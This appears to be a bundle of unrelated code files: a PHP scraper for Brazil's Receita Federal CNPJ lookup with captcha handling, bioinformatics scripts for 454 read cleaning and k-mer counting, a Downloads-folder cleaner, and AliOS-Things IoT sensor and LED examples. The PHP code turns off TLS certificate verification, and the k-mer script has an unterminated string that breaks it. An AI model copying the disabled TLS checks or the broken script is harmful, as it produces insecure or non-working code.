session_id(); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $this->getHeader()); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_exec($ch); curl_close($ch); $this->cookie_content = ''; $file = fopen($this->cookie_file, 'r'); while (!feof($file)) { $this->cookie_content .= fread($file, 1024); } fclose($file); $linha = explode("\n", $this->cookie_content); for ($contador = 4; $contador < count($linha) - 1; $contador++) { $explodir = explode(chr(9), $linha[$contador]); $this->cookie .= trim($explodir[count($explodir) - 2]) . "=" . trim($explodir[count($explodir) - 1]) . "; "; } $this->cookie = substr($this->cookie, 0, -2); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/captcha/gerarCaptcha.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $this->getHeader()); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIE, $this->cookie); curl_setopt($ch, CURLOPT_REFERER, 'http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $result = curl_exec($ch); curl_close($ch); return 'data:image/png;base64,' . 
base64_encode($result); } public function getHeader() { return [ 'servicos.receita.fazenda.gov.br', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection: keep-alive', 'Upgrade-Insecure-Requests: 1' ]; } public function consultaCNPJ($post = []) { $this->cookie_content = ''; if (!file_exists($this->cookie_file)) { return false; } else { $file = fopen($this->cookie_file, 'r'); while (!feof($file)) { $this->cookie_content .= fread($file, 1024); } fclose($file); $linha = explode("\n", $this->cookie_content); } for ($contador = 4; $contador < count($linha) - 1; $contador++) { $explodir = explode(chr(9), $linha[$contador]); $this->cookie .= trim($explodir[count($explodir) - 2]) . "=" . trim($explodir[count($explodir) - 1]) . "; "; } $this->cookie = substr($this->cookie, 0, -2); if (!strstr($this->cookie_content, 'flag 1')) { $linha = chr(10) . chr(10) . 'servicos.receita.fazenda.gov.br FALSE / FALSE 0 flag 1' . chr(10); $this->cookie = str_replace(chr(10) . 
chr(10), $linha, $this->cookie_content); unlink($this->cookie_file); $file = fopen($this->cookie_file, 'w'); fwrite($file, $this->cookie); fclose($file); $this->cookie .= ';flag=1'; } $data = [ 'origem' => 'comprovante', 'cnpj' => $post['cnpj'], 'txtTexto_captcha_serpro_gov_br' => $post['captcha'], 'search_type' => 'cnpj' ]; $data = http_build_query($data, NULL, '&'); $headers = array( 'Host: servicos.receita.fazenda.gov.br', 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:53.0) Gecko/20100101 Firefox/53.0', 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7', 'Connection: keep-alive', 'Upgrade-Insecure-Requests: 1', 'Accept-encoding: gzip', 'Accept-Charset: utf-8' ); $ch = curl_init('http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/valida.asp'); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookie_file); curl_setopt($ch, CURLOPT_COOKIE, $this->cookie); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_ENCODING, 'gzip'); curl_setopt($ch, CURLOPT_MAXREDIRS, 3); curl_setopt($ch, CURLOPT_REFERER, 'http://servicos.receita.fazenda.gov.br/Servicos/cnpjreva/Cnpjreva_Solicitacao_CS.asp'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $html = curl_exec($ch); curl_close($ch); return $this->parseCnpj($html); } public function parseCnpj($html = '') { $resultUTF8 = mb_convert_encoding($html, 'utf-8', 'ISO-8859-15'); $result = []; $crawler = new Crawler($resultUTF8); foreach ($crawler->filter('td') as $td) { $td = new Crawler($td); $info = $td->filter('font:nth-child(1)'); if ($info->count() > 0) { $key = utf8_decode(trim(strip_tags(preg_replace('/\s+/', ' ', $info->html())))); $attr = isset($this->attributes[$key]) ? 
$this->attributes[$key] : null; if ($attr === null) { continue; } $bs = $td->filter('font > b'); foreach ($bs as $b) { $b = new Crawler($b); $str = trim(preg_replace('/\s+/', ' ', $b->html())); $attach = utf8_decode(htmlspecialchars_decode($str)); if ($bs->count() == 1) $result[$attr] = $attach; else $result[$attr][] = $attach; } } } return $result; } public function pega_o_que_interessa($inicio, $fim, $total) { $interesse = str_replace($inicio, '', str_replace(strstr(strstr($total, $inicio), $fim), '', strstr($total, $inicio))); return ($interesse); } } <file_sep>/README.md # API de serviços ## 1 - Consulta CNPJ Receita Federal # WCAST Sistemas ### Dev. <NAME> Site: [WCast Sistemas](https://wcast.com.br).
e3ccef2456278b20192763b8fc751b5d20c01dbd
[ "Markdown", "PHP" ]
6
PHP
wcast/services
50da243132326d268f928fb5c9ee3d3b222f483c
6ebee0d6dad8c9b913ee75b96c4f83ca7bcfd317
refs/heads/master
<file_sep># 454_data_analsyis Back up of scripts used for 454 and sanger data analysis <file_sep>#!/usr/bin/bash -x # requires seq_crumbs # requires SPades files="../mid_MID1.sff ../mid_MID2.sff ../mid_MID3.sff ../mid_MID4.sff ../mid_MID5.sff ../mid_MID6.sff" time=$(date) echo $time > mid1_6_cleaning_data.txt echo "Cleaning of:" >> mid1_6_cleaning_data.txt echo $files >> mid1_6_cleaning_data.txt for file in $files do echo " " echo "working on $file" # extract file name string fastq=".fastq" filename=$(echo $file | grep -oE "mid_MID[0-9]") # extract sff to fastq echo "extracting sff" echo " " >> mid1_6_cleaning_data.txt sff_extract $file > $filename$fastq # trim adapters echo "Trimming adapters..." adapter_trim="_AT" filename_out1=$filename$adapter_trim adapter_array=($(tagcleaner -predict -fastq mid_MID1.fastq | sed -E "1d; s/tag.\t([ATGCN]+)\t.+\t.+/\1\n/")) tagcleaner -tag3 ${adapter_array[0]} -tag5 ${adapter_array[1]} -out_format 3 -out $filename_out1 -fastq $filename$fastq num_nuc_end2=$(sed -n 2~4p $filename$adapter_trim$fastq | tr -d '\n' | wc -m) num_nuc_start2=$(sed -n 2~4p $filename$fastq | tr -d '\n' | wc -m) delta2=$(bc <<< "scale = 2; (1-($num_nuc_end2/$num_nuc_start2))*100") echo "Tags used for $file:" >> mid1_6_cleaning_data.txt echo "-tag3 ${adapter_array[0]}" >> mid1_6_cleaning_data.txt echo "-tag5 ${adapter_array[1]}" >> mid1_6_cleaning_data.txt echo "Percent of nucleotides trimmed as tags/adapters $delta2 %" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # trim edges left_clip=30 right_clip=20 trim_edge="_TE" echo "Clipping edges..." 
echo "Left clip: $left_clip" echo "Right clip: $right_clip" filename_out2=$filename$adapter_trim$trim_edge$fastq trim_edges -l $left_clip -r $right_clip -o $filename_out2 $filename_out1$fastq num_nuc_start3=$(sed -n 2~4p $filename_out1$fastq | tr -d '\n' | wc -m) num_nuc_end3=$(sed -n 2~4p $filename_out2 | tr -d '\n' | wc -m) delta3=$(bc <<< "scale = 2; (1-($num_nuc_end3/$num_nuc_start3))*100") echo "Percent of nucleotides trimmed using edge clipping: ~ $delta3 %" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # filter by blast echo "filtering by blast " vector_trim="_VF" filtered_out_file="_filtered_out_seqs.fastq" filter_id=98 echo "Filtering with $filter_id % id" >> mid1_6_cleaning_data.txt filter_by_blast -b vectors_454.fasta -e $filename$filtered_out_file -s $filter_id -o $filename$adapter_trim$trim_edge$vector_trim$fastq $filename_out2 # Write how much was filtered echo "Filtering by blast stats for: $filename.sff" >> mid1_6_cleaning_data.txt start_num=$(grep -c "^@I" $filename_out2) echo "Starting num of reads: $start_num" >> mid1_6_cleaning_data.txt after_filter=$(grep -c "^@I" $filename$adapter_trim$trim_edge$vector_trim$fastq) echo "After filtering: $after_filter" >> mid1_6_cleaning_data.txt delta=$(bc <<< "scale = 2; $start_num-$after_filter") echo "Num of reads filtered out: $delta" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt # trim by quality echo "Trimming by quality..." 
quality_thresh=15 quality_clip="_QC" echo "Quality threshold: $quality_thresh" >> mid1_6_cleaning_data.txt filename_out3=$filename$adapter_trim$trim_edge$vector_trim$quality_clip$fastq trim_quality -q $quality_thresh -o $filename_out3 $filename$adapter_trim$trim_edge$vector_trim$fastq num_nuc_start4=$(sed -n 2~4p $filename$adapter_trim$trim_edge$vector_trim$fastq | tr -d '\n' | wc -m) num_nuc_end4=$(sed -n 2~4p $filename_out3 | tr -d '\n' | wc -m) delta4=$(bc <<< "scale = 2; (1-($num_nuc_end4/$num_nuc_start4))*100") echo "Percent of nucleotides trimmed using quality clipping: $delta4 %" >> mid1_6_cleaning_data.txt # assembly with Spades echo "assembling with Spades" out_file="~/Data/mids_all/cleaned_mids/Spades_output_trimmed_careful_" if (("$filename" == "mid_MID6")); then spades.py --trusted-contigs ~/Desktop/Spades_run/trust.fasta -m 10 -t 16 --careful --s1 $filename_out3 -o $out_file$filename else spades.py -m 10 -t 16 --careful --s1 $filename_out3 -o $out_file$filename fi # Pull out assemby info #cd $out_file$filename contigs_file="/home/mgrobelny/Data/mids_all/cleaned_mids/Spades_output_trimmed_careful_$filename/contigs.fasta" contig_stats=$(cat $contigs_file |grep ">" | sed -E 's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/') num_contigs=$(cat $contigs_file |grep ">" | sed -E 's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/'| cut -f 1 | tail -n 1) largest_contig=$( cat $contigs_file |grep ">" | sed -E 's/>NODE_([0-9]+)_length_([0-9]+)_cov_([0-9]+)/\1\t\2\t\3/'| cut -f 2 | head -n 1) #write contig stats to file echo " " >> mid1_6_cleaning_data.txt echo "Contig stats for $filename_out3 assembly" >> mid1_6_cleaning_data.txt echo "Total contigs: $num_contigs" >> mid1_6_cleaning_data.txt echo "Largest contig: $largest_contig" >> mid1_6_cleaning_data.txt echo " " >> mid1_6_cleaning_data.txt echo "#-------------------------------------------------------------------------------#" >> mid1_6_cleaning_data.txt assembly_data="_Asm_Data.tsv" echo 
"Contig_num Contig_len Contig_cov" > $filename$adapter_trim$trim_edge$vector_trim$quality_clip$assembly_data echo "$contig_stats" >> $filename$adapter_trim$trim_edge$vector_trim$quality_clip$assembly_data echo "done with $file.sff" done <file_sep>#!/usr/bin/python import sys import getopt import matplotlib import numpy as np matplotlib.use("Agg") # Force matplotlib to not use Xwindows backend. import matplotlib.pyplot as plt kmer = 11 file_name = "" xmax = 2000 argv = sys.argv[1:] try: opts, args = getopt.getopt(argv, "hk:x:f:") except getopt.GetoptError: print 'kmer.py -k <kmer_size> -x <x_axis_max> -f <inputfile>' sys.exit(2) for opt, arg in opts: if opt == '-h': print "K-mer frequnecy graphing script \n" print "Usage: \n" print 'kmer.py -k <kmer_size> -x <x_axis_max> -f <inputfile> \n\n' print "Goals: print "1) Take in fastq file and kmerize it and output kmer occurence frequnecy\n" print "2) Output graph of kmer occurence frequnecy\n" print "3) Output kmer occurence frequnecy to .tsv file\n" print "\n" sys.exit() elif opt in ("-k"): kmer = arg elif opt in ("-x"): xmax = arg elif opt in ("-f"): file_name = arg print "Kmer size is:", kmer print "X-axis max kmer count is:", xmax print "Input file is:", file_name print " " ############################################################################### # Progress bar is not my own work from: # https://gist.github.com/vladignatyev/06860ec2040cb497f0f3 # def progress(count, total, suffix=''): bar_len = 60 filled_len = int(round(bar_len * count / float(total))) percents = round(100.0 * count / float(total), 1) bar = '=' * filled_len + '-' * (bar_len - filled_len) sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', suffix)) sys.stdout.flush() ################################################## # Dictionary storing kmers kmer_dic = {} # importing file in_file = file_name fh1 = open(in_file, 'r') # Count number of lines in a file num_lines = sum(1 for line in fh1) fh1.close if num_lines >= 100000: print "Your file 
has %s number of lines..." % (num_lines) print "This may take a while to process..." print "...so be patience..." print " " fh2 = open(in_file, 'r') # skip first line next(fh2) count = 0 print "K-merizing the reads..." for line in fh2: progress(count, num_lines, suffix='done') count = count + 1 if count % 4 == 1: line.strip('\n') line_length = len(line) # Starting kmer parsing 0 to length of line minus kmer size for kmer_start_index in range(0, (int(line_length) - int(kmer))): # range for kmer kmer_end_index = kmer_start_index + int(kmer) # collect khmer for this iteraton kmer_string = line[kmer_start_index: kmer_end_index] # check for kmer in dictionary and ++ if not present add to dic and equal 1 kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1 # khmer freq dictionary kmer_dic_freq = {} # count the number of count of kmers for val in kmer_dic.values(): kmer_dic_freq[val] = kmer_dic_freq.get(val, 0) + 1 print " " print "#-----------------------------------------------------------------------#" list_of_kmer_occurences = [] list_of_kmer_occurences.append([]) list_of_kmer_occurences.append([]) # Print out list of counts of count of K-mers print "K-mer Frequency Number of K-mers in this category" for key in sorted(kmer_dic_freq.keys()): print key, " ", kmer_dic_freq[key] list_of_kmer_occurences[0].append(key) list_of_kmer_occurences[1].append(kmer_dic_freq[key]) print " " print "#-----------------------------------------------------------------------#" # Open file for writing file_out = "./%s_kmer_freq_data_Ksize_%s.tsv" % (file_name[:-6], kmer) fh_out = open(file_out, 'w') fh_out.write("K-mer Frequency\tNumber of K-mers in this category\n") for key in sorted(kmer_dic_freq.keys()): fh_out.write("%s\t%s\n" % (key, kmer_dic_freq[key])) fh_out.close # Ploting print "Graphing Kmers..." 
plt.bar(kmer_dic_freq.keys(), kmer_dic_freq.values(), edgecolor="none", width=1.0, log=True) plt.xlim(0, int(xmax)) plt.xlabel('Number of K-mers') plt.ylabel('Number of Appearances') plt.title('Counts of the number of Kmer Occurences') plt.annotate('K-mer size = %s' % (kmer), xy=(1, 3), xytext=((int(xmax)- 489), 21)) plt.grid(True) print "\nPrinting %s_kmer_freq_hist_Ksize_%s.png" % (file_name[:-6], kmer) # Save first graph plt.savefig("%s_kmer_freq_hist_Ksize_%s.png" % (file_name[:-6], kmer)) plt.close()
b6c4c5cd8638ec41b3e3e120d918100e651499de
[ "Markdown", "Python", "Shell" ]
3
Markdown
mattgrobelny/454_data_analysis
e3de1e6e35aa413c3120b44ee58679fc74edc5de
028cd7af6d69156129e1f80e9f063282b7f4cc2f
refs/heads/main
<file_sep># ライブラリのインポート import os import datetime import shutil # 変数設定 today = datetime.date.today() trashcan = today.strftime('%Y%m%d') delete_kouho = "削除候補フォルダ" downloadpath = os.getenv("HOMEDRIVE") + os.getenv("HOMEPATH") + "\Downloads" delete_kouho_path = downloadpath + "\削除候補フォルダ" # 関数部 #Transporter 使用されなかったファイル削除候補フォルダにを移動する def transporter(): os.chdir(downloadpath) os.mkdir(trashcan) move_list = [] if not os.path.exists(delete_kouho): os.mkdir(delete_kouho) print('ダウンロードフォルダの中に「削除候補フォルダ」を作成しました') # ファイル更新日から60日以上経過しているファイルを移動 contents = os.listdir(downloadpath) for file in contents: if os.path.isfile(file): timestamp = datetime.date.fromtimestamp(os.path.getmtime(file)) diff = today - timestamp if diff.days > 60: move_list.append(file) shutil.move(file, trashcan) if len(move_list) == 0: shutil.rmtree(trashcan) print('削除候補に移動されたファイルはありませんでした') elif len(move_list) >= 10: shutil.move(trashcan, delete_kouho) print('多数のファイルが削除候補に移動されました') print('削除候補の中のフォルダは30日間で削除されます') else: for file in move_list: print(file) shutil.move(trashcan, delete_kouho) print('上記のファイルが削除候補に移動されました') print('削除候補の中のフォルダは30日間で削除されます') #deleter transporter関数で作られた削除候補フォルダの内、30日以上使用されなかったものを移動する def deleter(): delete_list = [] os.chdir(delete_kouho_path) contents = os.listdir(delete_kouho_path) for dir in contents: timestamp = datetime.date.fromtimestamp(os.path.getmtime(dir)) diff = today - timestamp if diff.days > 30: delete_list.append(dir) shutil.rmtree(dir) if len(delete_list) == 0: print('削除したフォルダはありませんでした') else: for dir in delete_list: print(dir) print('上記のフォルダを削除しました') #処理部 transporter() deleter() input()
cc4f11641e5cb64b58a40019019bdfa2aef82952
[ "Python" ]
1
Python
Sabe0308/dircleaner
5fc9ce1165002d0c028460df11213d3be8d72d3b
a7e2b980327f74a83ca799c6175cda249327d029
refs/heads/master
<repo_name>lihaijun7781/Alithings-3.0.0<file_sep>/app/example/raceled/aos.mk NAME := raceled $(NAME)_MBINS_TYPE := app $(NAME)_VERSION := 1.0.0 $(NAME)_SUMMARY := raceled $(NAME)_SOURCES := raceled.c $(NAME)_COMPONENTS += osal_aos GLOBAL_DEFINES += AOS_NO_WIFI $(NAME)_INCLUDES += ./ <file_sep>/app/example/udata_demo/sensor_cloud_demo/sensor_cloud_demo.c /* * Copyright (C) 2015-2019 Alibaba Group Holding Limited */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdarg.h> #include "aos/cli.h" #include "aos/kernel.h" #include "sensor/sensor.h" #include "aos/yloop.h" #include "ulog/ulog.h" #include "netmgr.h" #include "linkkit/infra/infra_compat.h" #include "linkkit/infra/infra_defs.h" #include "linkkit/dev_model_api.h" #include "app_entry.h" #define SENSOR_SAMPLE_TIME 1000 /* sensor sampling period is 1000 ms*/ #define PROP_POST_FORMAT_TEMP "{\"CurrentTemperature\":%.1f}" #define PROP_POST_FORMAT_HUMI "{\"CurrentHumidity\":%.1f}" #define PROP_POST_FORMAT_ACC "{\"Accelerometer\":{\"x\":%.2f, \"y\":%.2f, \"z\":%.2f}}" static volatile char g_wifi_connect = 0; /* wifi connect flag */ #ifdef AOS_COMP_CLI static void print_devinfo() { char _product_key[IOTX_PRODUCT_KEY_LEN + 1] = {0}; char _device_name[IOTX_DEVICE_NAME_LEN + 1] = {0}; #ifdef DEMO_DEBUG char _product_secret[IOTX_PRODUCT_SECRET_LEN + 1] = {0}; char _device_secret[IOTX_DEVICE_SECRET_LEN + 1] = {0}; #endif HAL_GetProductKey(_product_key); HAL_GetDeviceName(_device_name); LOG("pk:%s", _product_key); LOG("dn:%s", _device_name); #ifdef DEMO_DEBUG HAL_GetProductSecret(_product_secret); HAL_GetDeviceSecret(_device_secret); LOG("ps:%s", _product_secret); LOG("ds:%s", _device_secret); #endif } static void set_devinfo(char *pk, char *ps, char *dn, char *ds) { if (dn != NULL) { HAL_SetDeviceName(dn); } if (ds != NULL) { HAL_SetDeviceSecret(ds); } if (pk != NULL) { HAL_SetProductKey(pk); } if (ps != NULL) { HAL_SetProductSecret(ps); } } static void handle_devinfo_cmd(char *pwbuf, int blen, int argc, 
char **argv) { const char *rtype = argc > 1 ? argv[1] : ""; if (strcmp(rtype, "get") == 0) { print_devinfo(); } else if (strcmp(rtype, "set") == 0) { if (argc == 4) { set_devinfo(NULL, NULL, argv[2], argv[3]); } else if (argc == 5) { set_devinfo(argv[2], argv[3], argv[4], ""); } else if (argc == 6) { set_devinfo(argv[2], argv[3], argv[4], argv[5]); } else { LOG("arg number err! usage:"); LOG("devinfo set {pk} {ps} {dn} [ds] | devinfo set {dn} {ds}"); } } else if (strcmp(rtype, "clean") == 0) { set_devinfo("", "", "", ""); } else { LOG("usage:"); LOG("devinfo [set pk ps dn ds | set dn ds | get | clean]"); } } static struct cli_command devinfo_cmd = { .name = "devinfo", .help = "devinfo [set pk ps dn ds | set dn ds | get | clean ]", .function = handle_devinfo_cmd }; #endif /* linkkit initialize callback */ static int user_initialized(const int devid) { user_example_ctx_t *user_example_ctx = user_example_get_ctx(); LOG("Device Initialized, Devid: %d", devid); /* Set the linkkit initialize success flag */ if (user_example_ctx->master_devid == devid) { user_example_ctx->master_initialized = 1; } return 0; } /* wifi connect success callback */ static void wifi_service_event(input_event_t *event, void *priv_data) { netmgr_ap_config_t config; if (event->type != EV_WIFI) { return; } if (event->code != CODE_WIFI_ON_GOT_IP) { return; } memset(&config, 0, sizeof(netmgr_ap_config_t)); netmgr_get_ap_config(&config); LOG("wifi_service_event config.ssid %s", config.ssid); if (strcmp(config.ssid, "adha") == 0 || strcmp(config.ssid, "aha") == 0) { return; } #ifdef EN_COMBO_NET if (awss_running) { awss_success_notify(); } #endif /* Set wifi connect flag */ if (g_wifi_connect == 0) { g_wifi_connect = 1; } } /* sensor cloud test, include the following functions */ /* 1. wait wifi conect */ /* 2. link aliyun server */ /* 3. sensor start */ /* 4. 
handle linkkit event */ void sensor_cloud_test(void *arg) { int ret = 0; char param[128]; temperature_data_t temp; accel_data_t acc; iotx_linkkit_dev_meta_info_t master_meta_info; user_example_ctx_t *user_ctx = user_example_get_ctx(); (void)arg; /* Wait the wifi connect flag to set */ while(g_wifi_connect == 0){ static int cnt = 0; static int retry = 0; aos_msleep(100); if (cnt++ == 80) { printf("Connect AP failed , retry ....\n\n"); netmgr_start(true); if (retry++ < 5) { cnt = 0; } } if (cnt > 200) cnt = 0; } /* Linkkit start */ ret = linkkit_init(); if (ret != 0){ return; } /* Register linkkit initialize callback */ IOT_RegisterCallback(ITE_INITIALIZE_COMPLETED, user_initialized); memset(&master_meta_info, 0, sizeof(iotx_linkkit_dev_meta_info_t)); #if 0 memcpy(master_meta_info.product_key, PRODUCT_KEY, strlen(PRODUCT_KEY)); memcpy(master_meta_info.product_secret, PRODUCT_SECRET, strlen(PRODUCT_SECRET)); memcpy(master_meta_info.device_name, DEVICE_NAME, strlen(DEVICE_NAME)); memcpy(master_meta_info.device_secret, DEVICE_SECRET, strlen(DEVICE_SECRET)); #else HAL_GetProductKey(master_meta_info.product_key); HAL_GetDeviceName(master_meta_info.device_name); HAL_GetDeviceSecret(master_meta_info.device_secret); #endif /* Create a new device */ user_ctx->master_devid = IOT_Linkkit_Open(IOTX_LINKKIT_DEV_TYPE_MASTER, &master_meta_info); if (user_ctx->master_devid < 0) { printf("IOT_Linkkit_Open Failed\n"); return; } /* Start Connect Aliyun Server */ ret = IOT_Linkkit_Connect(user_ctx->master_devid); if (ret < 0) { printf("IOT_Linkkit_Connect Failed\n"); return; } /* Sensor Hal start */ ret = sensor_hal_init(); if (ret != 0) { return; } #if 0 /* Open the acceleration sensor device */ ret = sensor_hal_open(TAG_DEV_ACC, 0); if (ret != 0) { return; } #endif /* Open the temperature sensor device */ ret = sensor_hal_open(TAG_DEV_TEMP, 0); if (ret != 0) { return; } /* Set the sampling period for sensors */ // (void)sensor_hal_ioctl(TAG_DEV_ACC, 0, SENSOR_IOCTL_ODR_SET, 
SENSOR_SAMPLE_TIME); (void)sensor_hal_ioctl(TAG_DEV_TEMP, 0, SENSOR_IOCTL_ODR_SET, SENSOR_SAMPLE_TIME); /* Enter loop run to handle linkkit event */ while (1) { #if 0 /* Read the acceleration sensor data */ ret = sensor_hal_read(TAG_DEV_ACC, 0, &acc, sizeof(acc)); if (ret > 0) { /* Print the acceleration sensor data */ printf("\nAcceleration value: x-axis(%.3f g) y-axis(%.3f g) z-axis(%.3f g) \n", ((float)acc.data[0])/1000 , ((float)acc.data[1])/1000, ((float)acc.data[2])/1000); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_ACC, ((float)acc.data[0])/1000 , ((float)acc.data[1])/1000, ((float)acc.data[2])/1000); /* Report the acceleration data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } #endif /* Read the temperature sensor data */ ret = sensor_hal_read(TAG_DEV_TEMP, 0, &temp, sizeof(temp)); if (ret > 0) { /* Print the temperature sensor data */ printf("\nTemperature value : %.1f centidegree\n", ((float)temp.t)/10); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_TEMP, ((float)(temp.t))/10); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } ret = sensor_hal_read(TAG_DEV_HUMI, 0, &temp, sizeof(temp)); if (ret > 0) { /* Print the temperature sensor data */ printf("\nHumi value : %.1f \n", ((float)temp.t)/10); memset(param, 0, 128); /* build the report payload */ sprintf(param, PROP_POST_FORMAT_HUMI, ((float)(temp.t))/10); /* Report the temperature data to cloud */ if (user_ctx->master_initialized != 0) { ret = IOT_Linkkit_Report(user_ctx->master_devid, ITM_MSG_POST_PROPERTY, (unsigned char *)param, 
strlen(param) + 1); if (ret == -1) { LOG("%s %d fail\n", __func__,__LINE__); } } } IOT_Linkkit_Yield(2000); } } int application_start(int argc, char **argv) { int ret; #ifdef WITH_SAL sal_add_dev(NULL, NULL); /* Sal initialize if needed */ sal_init(); #endif #ifdef AOS_COMP_CLI aos_cli_register_command(&devinfo_cmd); #endif /* Set debug log show */ aos_set_log_level(AOS_LL_DEBUG); /* Wifi initialize */ /* User can use the following cli commands to connect wifi */ /* Clear wifi command: netmgr clear */ /* Connect wifi command: netmgr connect ssid passwd */ netmgr_init(); /* Register wifi connect callback */ aos_register_event_filter(EV_WIFI, wifi_service_event, NULL); /* Creat task for sensor cloud test */ ret = aos_task_new("sensor_cloud_test", sensor_cloud_test, NULL, 8192); if (ret != 0) { return -1; } /* Connect wifi with old ssid and passwd */ netmgr_start(true); /* Enter yloop */ aos_loop_run(); return 0; } <file_sep>/app/example/sensor_gui/aos.mk NAME := sensor_gui $(NAME)_MBINS_TYPE := app $(NAME)_VERSION := 1.0.1 $(NAME)_SUMMARY := Everylinked sensor GUI example $(NAME)_SOURCES := developerkitgui.c sensor_display.c freetype_display.c AliOS_Things_logo.c $(NAME)_COMPONENTS := yloop cli freetype253 fatfs sensor linkkit_sdk_c netmgr cjson ENABLE_IRDA_HAL := 1 ENABLE_CAMERA_HAL := 1 $(NAME)_INCLUDES += . 
$(NAME)_COMPONENTS += littlevGL $(NAME)_SOURCES += sensor_cloud_demo.c $(NAME)_SOURCES += linkkit/linkkit_example_solo.c $(NAME)_INCLUDES += ./ ./linkkit GLOBAL_DEFINES += LITTLEVGL_DEVELOPERKIT CONFIG_AOS_FATFS_SUPPORT_MMC <file_sep>/drivers/sal/wifi/esp8266_12F/aos.mk NAME := device_sal_esp8266_12F $(NAME)_MBINS_TYPE := kernel $(NAME)_VERSION := 1.0.1 $(NAME)_SUMMARY := sal hal implementation for esp8266_12F $(NAME)_SOURCES += wifi_atcmd.c GLOBAL_DEFINES += DEV_SAL_ESP8266_12F $(NAME)_COMPONENTS += yloop ifneq (1, $(at_adapter)) $(NAME)_COMPONENTS += atparser $(NAME)_SOURCES += esp8266_12F.c endif $(NAME)_INCLUDES += ./ <file_sep>/app/example/raceled/README.md # raceled sample ## Contents ```sh raceled ├── raceled.c # raceled source code ├── Config.in # kconfig file ├── raceled.mk # aos build system file └── k_app_config.h # aos app config file ``` ## Introduction The **raceled** example shows how to drive LEDs and use of GPIO input with interrupts on the [supported boards](../../../board) in AliOS-Things, the example will work like this: * RGB led loop every 1s. * push button will turn raceled on/off. ### Requirements in `raceled.c` need to redefine the following macro: * `GPIO_RED `(LED red) * `GPIO_BLUE`(LED blue) * `GPIO_GREEN`(LED green) ### Features * RGB LED run one loop every 1s. * push button will turn raceled on/off. ### Dependencies * yloop * cli ### Supported Boards - all ### Build ```sh # generate raceled@everylinked default config aos make raceled@everylinked -c config # or customize config manually aos make menuconfig # build aos make ``` > if you want to see AliOS-Things supports boards, click [board](../../../board). ### Install ```sh aos upload raceled@yourboard ``` > if you are not sure is the`aos upload` command supports your board, check [aos upload](../../../build/site_scons/upload). 
### Reference * https://yq.aliyun.com/articles/669088 ### support for st nucleo board * verified on stm32l476rg everylink board, other nucleo also can be supported, please refer to the hardware guide for the gpio pin number <file_sep>/app/example/raceled/raceled.c /* * Copyright (C) 2015-2017 Alibaba Group Holding Limited */ #include <stdio.h> #include "aos/kernel.h" #include "ulog/ulog.h" #include "aos/hal/gpio.h" #define GPIO_LED_IO 45 #define GPIO_TRIGGER_IO 11 #define GPIO_INPUT_IO 41 #define GPIO_RED 45 #define GPIO_BLUE 43 #define GPIO_GREEN 42 static void app_trigger_low_action(void *arg); static void app_trigger_high_action(void *arg); gpio_dev_t led; gpio_dev_t trigger; gpio_dev_t input; //add for st nucleo board gpio_dev_t led_red; gpio_dev_t led_green; gpio_dev_t led_blue; static void gpio_isr_handler(void* arg) { uint32_t gpio_num = (uint32_t) arg; uint32_t value = 0; hal_gpio_input_get(&input, &value); hal_gpio_output_toggle(&led); LOG("GPIO[%u] intr, val: %u\n", gpio_num, value); } static void app_trigger_low_action(void *arg) { hal_gpio_output_low(&trigger); aos_post_delayed_action(1000, app_trigger_high_action, NULL); } static void app_trigger_high_action(void *arg) { hal_gpio_output_high(&trigger); aos_post_delayed_action(1000, app_trigger_low_action, 